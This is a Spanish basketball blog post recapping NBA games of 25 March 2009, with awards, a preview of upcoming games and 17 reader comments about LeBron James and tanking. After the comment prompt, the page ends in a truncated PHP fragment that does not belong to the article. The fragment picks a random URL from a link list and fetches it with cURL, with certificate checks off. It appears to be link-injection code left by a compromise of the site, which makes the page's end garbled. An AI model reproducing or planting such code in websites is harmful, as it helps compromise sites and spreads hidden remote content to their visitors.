La Crónica (25/03/2009)

26 de March de 2009 por TheDeerHunter

Jornada intensísima, cargada con todos los alicientes posibles para disfrutarla por completo. Batallas en todos los frentes, emoción y sorpresas.

El principal foco de interés giraba anoche en torno a la carrera por la cabeza del Este. En uno de los duelos de mayor nivel al que uno puede asistir hoy en día los Celtics visitaban Orlando jugándose más que el mero resultado del partido. El ahora mismo más que posible enfrentamiento en 2ª ronda. Anoche el choque no terminó de coger el ritmo de máxima competición con un Garnett excesivamente mermado, pero sí vimos buen tono defensivo entre dos de los equipos más rocosos de la liga. Al final, el gato al agua se lo llevó el equipo de Dwight Howard, que asegura así el título de su división y supera a Boston en la clasificación.

Había algo menos de curiosidad ante el partido “fácil” contra los Nets que tenía que sacar adelante Lebron. Lo hizo sin apenas despeinarse, de la misma manera que bate récords como quien no quiere la cosa. Ni Jordan, ni Bird, ni Magic… sólo Oscar Robertson cuenta con más temporadas que él en los 2.000 puntos, 500 rebotes y 500 asistencias. Se dice pronto. Esa es la magnitud de este animal.

La batalla por ser último cabeza de serie en esta conferencia también se pone al rojo vivo. Los Hawks no pudieron con unos Spurs sin Duncan ni Ginobili. Parker decidió pegarnos una en toda la boca y se cargó al equipo a las espaldas ganando en Atlanta un partido muy complicado con una facilidad asombrosa. Wade y sus Heat no tuvieron su noche en Indiana y perdieron uno de esos partidos en los que los locales se han especializado este año. Y a río revuelto ganancia de los Sixers, que no aflojan. Mucho menos anoche ante los Timberwolves y con los resultados tan favorables que se estaban dando. Se puede decir que han alcanzado a Miami pero ponerse a la altura de los Hawks será un poco más difícil.

Por último en el Este, tropezón casi definitivo de Charlotte, Milwaukee y New York contra Wizards, Raptors y Clippers respectivamente. Calderón vuelve a tener el tono pero ya es demasiado tarde.

En el Oeste el asunto no se quedó corto. Los Suns ganaron a los Jazz contra pronóstico. Un Hill decisivo mantiene vivo al equipo en un partido que no era nada fácil. Por desgracia para ellos los Mavericks pillaron a los Warriors fundidos tras el palizón de anoche en San Antonio y no les dieron ninguna opción.

Finalmente en el duelo directo por el cuadro alto del Oeste, los Nuggets tumbaron a unos Hornets enrachados en su propia casa. Partidazo de Billups&Carmelo contra los locales que todavía arrastran las importantes bajas de Stojakovic y Chandler.

PREMIOS

MVP: En una noche con tantos partidos y tantas buenas actuaciones, dos han destacado por su trascendencia. Dwight Howard mandó un mensaje muy claro a los Celtics de cara a unas más que posibles semifinales de Conferencia. El mensaje llegó en forma de 24 puntos, 21 rebotes, 4 tapones, 2 asistencias y 2 robos en el triunfo que permite a los Magic superar a los Celtics en la carrera por la segunda posición del Este. Tal vez más meritorio resultó lo de Tony Parker, que ante el descanso otorgado por Popovich a Duncan, llevó todo el peso de su equipo y acabó con la racha de ocho victorias de los Hawks con 42 puntos (impresionante su 18 de 25 en tiros), 10 asistencias y 3 rebotes.

El rookie: La actuación de Mike Taylor en el Madison Square Garden podría pasar por la del MVP del día o, sobre todo, por la de la sorpresa. El base, elegido en segunda ronda del pasado draft, salió de no sabemos dónde para destrozar a los Knicks, guiar a los Clippers a una remontada de 19 puntos, y acabar con 35 puntos (14 de 20 en tiros), 8 rebotes, 3 asistencias y 2 recuperaciones. Para hacerse una idea de lo sorprendente de su actuación vale con tener en cuenta que Taylor había sumado un total de 14 puntos en los últimos 8 partidos.

La sorpresa: Ya vimos a Anthony Morrow hacer extraordinario el pasado noviembre en aquel partido contra los Clippers, cuando anotó 37 puntos con un 15 de 20 en tiros. Anoche, ante los Mavs, logró 29 puntos con un 10 de 11. Por ello, lo más sorprendente del asunto no es el partidazo de Morrow, sino que Nelson volverá a olvidarse de él el próximo partido.

La decepción: Pese a la victoria de su equipo, Turkoglu nos regaló un escalofriante 3 de 18 en tiros. También nos falló Wade, que aportó 8 asistencias y 4 robos pero sólo acertó en 5 de sus 24 lanzamientos.

El mayor esfuerzo en vano: Al Harrington vio cómo la historia se repetía. Hace poco más de un mes, en la visita de los Knicks a los Clippers, los árbitros le señalaron una técnica tras hacer un mate por colgarse del aro cuando había puesto a su equipo 3 arriba a falta de apenas 25 segundos para el final. Aquello permitó a los Clippers forzar la prórroga y ganar el partido. alharringtontingAnoche los hechos fueron idénticos: un mate de Harrington puso a los Knicks tres arriba a 27 segundos, pero recibió una técnica y los Clippers lo aprovecharon para anotar tres puntos, forzar la prórroga y llevarse el partido. De este modo, los 38 puntos y 7 rebotes de Al Harrington no sirvieron para nada.

RAZONES PARA TRASNOCHAR

Esta próxima noche hay pocos partidos pero muchas cosas en juego. El menú es el siguiente:

Lakers @ Pistons (00.30 h, GMT+1). O cómo los Lakers pueden poner su granito de arena en el complicado panorama de los Pistons.

Heat @ Bulls (01.00 h). O la certeza de que Wade volverá a salirse ante el equipo de su ciudad natal.

Suns @ Blazers (3.30 h). O si los Suns son capaces de ganar en Portland empezarán a dar mucho miedo como posible rival de primera ronda.

PREGUNTA DEL DíA

Me voy a pasar… ¿cuánto le falta a LeBron James para ser considerado uno de los grandes de la historia de la NBA? ¿Tan sólo un título?

Comenta

17 comentarios a esta entrada

  1. Txusma dice:
    #1

    Ojito al quinteto titular ayer de Minnessotta: Rodney Carney, Brian Cardinal, Craig Smith, Bobby Brown y el gran Kevin Ollie!! Y en el banco Love, Foye, Miller y Gomes.
    McHale dice que ha querido dar descanso a sus chicos pero para mi está claro a que juegan los Wolves y en mi pueblo eso se llama manipular el resultado de la competicion.

      Citar

  2. Viva_Dirk dice:
    #2

    Pues depende de a lo que te refieras con ‘uno de los grandes’, para mi Lebron ahora mismo esta como muy alto en un tercer grupo. Incluso sin contar a Jordan como ‘fuera de categoria’ y metiendolo en el grupo uno con Magic, Bird, Olajuwon, Jabbar, Russell o Robertson, para mi hay un segundo que aun le queda lejos a Lebron con gente como Doctor J, Havliceck, West, Duncan(que veremos si no acaba en el primero), Moses Malone y un largo etc.

    Para mi aunque gane el título este año, que espero muy mucho que no, no subirá de nivel ya que hay que ver que hace con el resto de su carrera, a mi se me antoja prontísimo.

      Citar

  3. Txusma dice:
    #3

    Ui! Podemos discutir muy mucho esos grupos que has puesto…
    Para mi en el primer grupo estarían Jordan, Magic y Bird, como mínimo. Escoger a uno es cuestion de gustos.
    Y puede ser que Lebron este aun en un tercer grupo, lo q me chirria es ver a Robertson en el segundo.

      Citar

  4. Dantley dice:
    #4

    jo, jo, Kevin Ollie de titular, grande ¡¡¡ Pero vamos, estamos con lo mismo de siempre, el año pasado tuvo de premio Beasley para Miami. Me parece demasiado claro y deberían cortar ese tema ya.

    A LeBron le faltan tres cosas, edad, que eso se gana con el tiempo, algún título/s individuales y sobre todo colectivos, y lo que ya otras veces hablamos de estética, juega tela de feo. Pero vamos, la realidad es innegable, ahora por edad estaría en ese tercer grupo, pero en realidad está en el segundo ya. Si pasa a ser del primero (otra cosa es los nombres que pongamos en el primero) creo que es cuestión de que no se le cruce una lesión gorda, una mala vida o yo que sé.

      Citar

  5. Dantley dice:
    #5

    Descartando los que no he visto, aunque está claro que Chamberlain y Russell están, pero por bajar a lo que hemos visto, hay tres fijísimos Magic, Jordan y Bird. Sobre cualquier otro pueden haber dudas.

      Citar

  6. MagicJohnson32 dice:
    #6

    ¿Y en qué grupo ponemos a Adrian? 😉

      Citar

  7. kantonyo dice:
    #7

    Respecto a LeBron es bastante bueno, llegará a ser una leyenda casi seguro, pero yo creo que todavia no ha llegado al nivel de Kobe Bryant o Shaquille O’Neal, es demasiado pronto, además no ha sido todavia campeón y en este juego de eso se trata.

    Y por lo de los Wolves, pues si, están jugando a perder, pero creo que ellos son los menos interesados a priori en quedarse con Blake Griffin, ya que su duo interior Love-Jefferson pinta muy bien. Aunque claro si fueran número 1 en la loteria del draft, no lo dejarian escapar. A ver si piensan otra forma de elegir en el draft, a lo mejor tendrian que tener en cuenta los resultados a mitad de temporada que son más justos en los puestos de abajo de la clasificacion.

      Citar

  8. MagicJohnson32 dice:
    #8

    Ah, sí, y tremendo McHale. Descansar, dice… Claro, para que lleguen frescos a Playoffs ¿verdad?

      Citar

  9. Viva_Dirk dice:
    #9

    Txus, he puesto a Robertson en el primero. Esta claro que cada uno tenemos unos gustos pero para mi ‘Big O’ esta claramente con los mas grandes.

      Citar

  10. Vader dice:
    #10

    Sobre el tema Lebron yo si creo que será uno de los más grandes.

    Sobre el tema de jugar a perder para el draft supongo que algun dia le pondran remedio. Por ejemplo haciendo que todos los equipos fuera de playoff tengan las mismas posibildades en el pick o por los menos los 5 o 6 peores equipos tengan el mismo porcentaje de ganar el número 1.

    Saludos

      Citar

  11. Jabho dice:
    #11

    Bueno sobre el boston-Orlando decir que partidazo de la bestia howard, Orlando en casa, garnett flojito y ganaron los Magic de 2…. no pinta tan mal a pesar de todo.

    La pregunta sobre Lebron me parece claro que para llegar al primer grupo hay que ganar titulos. Mas allá de los records individuales hay que ganar… De momento su carrera pinta a fuera de serie, pero para eso debe ganar anillos.

    Lo de los Wolves es de traca pero vamos, como los Heat el año pasado no s eha visto otra igual….

    Me pregunto yo si llegaran los Suns a PO. Creo que no pero están apretando de lo lindo….

      Citar

  12. TheDeerHunter dice:
    #12

    Garnett flojito pero también Turkoglu flojísimo… mejor pinta para Orlando que, además de la pequeña ventaja tiene un calendario favorable.
    Una posible primera ronda Boston-Detroit… y quizás con toda la artillería de Detroit en liza. Se me hace la boca agua… (no voy a decir con quien iría, jojojo)

    Como siempre, me llama muchísimo la atención la clasificación hecha por Viva… aunque no voy a entrar en la batalla que nos desviamos.
    Lo de Lebron… sencillamente a esa edad no lo había hecho ni dios, lo cual no quiere decir demasiado si no lo rubrica. Pero lo que hace parece tan fácil de hacer que asusta… y tampoco lo etiquetemos de juego feo, por dioss… para juego feo lo de Artest o lo de Bruce Lee Bowen…

      Citar

  13. Txusma dice:
    #13

    En verano ya tendremos tiempo de centrarnos en debates eternos! jejeje

      Citar

  14. aro_pasado_no_newtoniano dice:
    #14

    Y si Txusma fuera de ciudad ¿también se adulteraría la competición?

      Citar

  15. UnderlocK dice:
    #15

    LeBron va a reventar todas la estadisticas, pero en la NBA a parte de numeros los mas grandes suelen ser recordados por llevar a sus equipos a ganar anillos y si no es esta temporada será pronto cuando lo consiga.

    Ojito a los Magic en playoffs son un equipo muy solido y dificil de ganar por las variantes en ataque que tienen, no me sorprenderia verlos en la final de la conferencia.

      Citar

  16. aro_pasado_no_newtoniano dice:
    #16

    ¿cómo se valora la posibilidad de que Eddy Curry tenga minutos por segunda vez en la temporada?

      Citar

  17. JJ5 dice:
    #17

    No descubro nada si digo que se veía venir…

    La ausencia de Garnett ha pesado mucho, pero más aún la “desaparición” de Rondo como jefe de operaciones. El ataque se ha convertido en un Juan Palomo entre Pierce y Allen. En definitiva, no juegan como equipo.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>